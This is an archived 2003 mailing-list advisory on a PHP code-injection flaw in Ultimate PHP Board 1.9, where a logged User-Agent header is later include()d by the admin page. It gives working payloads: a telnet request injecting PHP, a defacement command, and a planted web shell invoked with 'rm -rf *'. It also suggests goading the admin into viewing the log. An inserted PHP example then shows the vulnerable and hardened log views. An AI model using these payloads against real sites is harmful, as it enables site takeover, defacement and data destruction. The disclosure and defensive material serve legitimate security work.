UPB: Discussion Board/Web-Site Takeover

From: euronymous (just-a-userat_private)
Date: Sat May 24 2003 - 07:21:37 PDT


    =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
    topic: UPB: Discussion Board/Web-Site Takeover
    product: Ultimate PHP Board v1.9 [ latest ]
    vendor: www.myupb.com
    risk: high
    date: 05/24/2k3
    discovered by: euronymous /F0KP 
    advisory urls: http://f0kp.iplus.ru/bz/024.en.txt
                   http://f0kp.iplus.ru/bz/024.ru.txt 
    contact email: euronymousat_private
    =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
    
    
    description
    -----------
    
    there is a serious vuln that allows an attacker to execute arbitrary php
    code. the UPB logs some visitor info [ such as REMOTE_ADDR and
    HTTP_USER_AGENT ] in a text file named `iplog' under the `db' directory.
    then from the admin panel the board admin can call admin_iplog.php, which
    simply include()s `iplog'. that's 0k, but..
    
    e@some_host$ telnet hostname 80
    Connected to hostname at 80
    GET /board/index.php HTTP/1.0
    User-Agent: <? phpinfo(); ?>
    
    when the admin calls admin_iplog.php, your php code will be executed.
    
    examples for kodsweb skids:
    
    1. <? system( "echo \'hacked\' > ../index.html" ); ?>
    
    will deface the forum main page
    
    2. <? system( "echo \'<? system( $cmd ); ?>\' > ../../tcsh.php" ); ?>
    
    will create tcsh.php in the wwwroot with httpd privileges.
    then you just go to http://hostname/tcsh.php?cmd=rm -rf *
    
    after injecting code through the User-Agent field you have to wait for the
    admin to view admin_iplog.php. how to make the admin look at the iplog?? it's
    quite easy == just annoy the admin, use swearing in board messages, etc.
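    the root cause, as an added illustration that is not UPB's source: a request
    header is appended verbatim to a file that is later include()d, so the php
    parser treats the log as code. the safe view below reads the same file as
    plain text and html-escapes it; paths and function names are assumptions.

```php
<?php
// Constructed illustration of the flaw described above; not the UPB source.
// Assumed path mirroring the advisory: visitor data is appended to db/iplog.
$iplog = __DIR__ . '/db/iplog';

// Logging side: REMOTE_ADDR and the attacker-controlled User-Agent header
// are written to the file. Stripping control characters and capping the
// length limits log-injection tricks but does NOT make include() safe.
function log_visitor(string $file): void
{
    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '-';
    $ua = substr(preg_replace('/[\x00-\x1f\x7f]/', '?', $ua), 0, 256);
    $line = sprintf("%s %s %s\n", date('c'), $_SERVER['REMOTE_ADDR'] ?? '-', $ua);
    file_put_contents($file, $line, FILE_APPEND | LOCK_EX);
}

// Vulnerable admin view (the pattern the advisory describes): include()
// executes any "<? ... ?>" sequence that a visitor managed to get logged.
function show_iplog_vulnerable(string $file): void
{
    include $file;
}

// Hardened admin view: the log is data, never code. Read it as text and
// escape it for HTML so a logged "<? phpinfo(); ?>" is displayed, not run.
function show_iplog_safe(string $file): void
{
    $lines = @file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if ($lines === false) {
        echo '<p>no iplog entries</p>';
        return;
    }
    echo '<pre>';
    foreach ($lines as $line) {
        echo htmlspecialchars($line, ENT_QUOTES | ENT_HTML5, 'UTF-8'), "\n";
    }
    echo '</pre>';
}

// Admin page entry point: only the safe renderer is wired up.
show_iplog_safe($iplog);
```

    keeping `db/iplog' outside the web root (or denying direct http access to
    `db/') closes the second half of the problem, since the file then cannot be
    fetched or requested as a script even if its contents are attacker-controlled.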
    
    
    bonus
    -----
    
    in http://www.securityfocus.com/archive/1/302459 i wrote about some
    vulns in prior versions of UPB, and i wanna say that some of the
    described vulns still exist in 1.9!!
    
    have a nice day >:E
    
    
    shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru, 
    N0b0d13s Team and all russian security guyz!! 
    to kate especially )) 
    hates: slavomira and other dirty ppl in *.kz $#%&^!  
    k0dsweb lamers team == yeah, i really __HATE__ yours!!
              
    
    ================
    im not a lame,
    not yet a hacker
    ================
    



    This archive was generated by hypermail 2b30 : Sat May 24 2003 - 10:29:21 PDT